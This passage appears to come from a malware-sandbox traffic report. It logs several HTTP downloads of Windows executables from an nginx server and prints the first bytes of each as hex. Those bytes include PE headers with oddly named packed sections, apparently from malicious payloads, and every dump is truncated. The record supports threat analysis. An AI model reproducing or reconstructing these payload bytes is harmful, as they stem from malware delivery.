fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 09 84 ab 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 04 49 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:14 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:21 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:26 GMTContent-Type: application/octet-streamContent-Length: 10302976Last-Modified: Fri, 24 Jan 2025 18:07:34 GMTConnection: keep-aliveETag: "6793d6e6-9d3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 16 9d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 24 49 00 00 bc 04 00 00 00 00 00 d0 61 06 00 00 10 00 00 00 f0 94 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 a0 00 00 04 00 00 f7 da 9d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 9c 00 dc 03 00 00 00 60 a0 00 97 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9c 00 6a a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 fa 94 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 22 49 00 00 10 00 00 00 24 49 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 a8 4b 00 00 40 49 00 00 aa 4b 00 00 28 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 93 07 00 00 f0 94 00 00 9e 04 00 00 d2 94 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 90 9c 00 00 04 00 00 00 70 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6a a0 03 00 00 a0 9c 00 00 a2 03 00 00 74 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 50 a0 00 00 02 00 00 00 16 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 97 1c 00 00 00 60 a0 00 00 1e 00 00 00 18 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:24 GMTContent-Type: application/octet-streamContent-Length: 2155008Last-Modified: Tue, 11 Feb 2025 17:11:35 GMTConnection: keep-aliveETag: "67ab84c7-20e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 51 4b 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ad 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 70 74 66 73 68 65 00 30 1a 00 00 90 31 00 00 24 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 67 6f 62 61 66 74 6d 00 10 00 00 00 c0 4b 00 00 04 00 00 00 bc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 c0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:31 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:38 GMTContent-Type: application/octet-streamContent-Length: 414016Last-Modified: Tue, 11 Feb 2025 08:59:13 GMTConnection: keep-aliveETag: "67ab1161-65140"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 f2 43 da 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 f0 00 00 00 08 00 00 00 00 00 00 be 0e 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 0e 01 00 4b 00 00 00 00 20 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 0c 06 00 40 45 00 00 00 40 01 00 0c 00 00 00 21 0e 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 ee 00 00 00 20 00 00 00 f0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 60 01 00 00 10 05 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:43 GMTContent-Type: application/octet-streamContent-Length: 745472Last-Modified: Thu, 06 Feb 2025 02:47:54 GMTConnection: keep-aliveETag: "67a422da-b6000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 2a 01 00 00 08 00 00 00 00 00 00 0e 49 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0b 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 48 01 00 4b 00 00 00 00 60 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 0c 00 00 00 78 48 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 29 01 00 00 20 00 00 00 2a 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 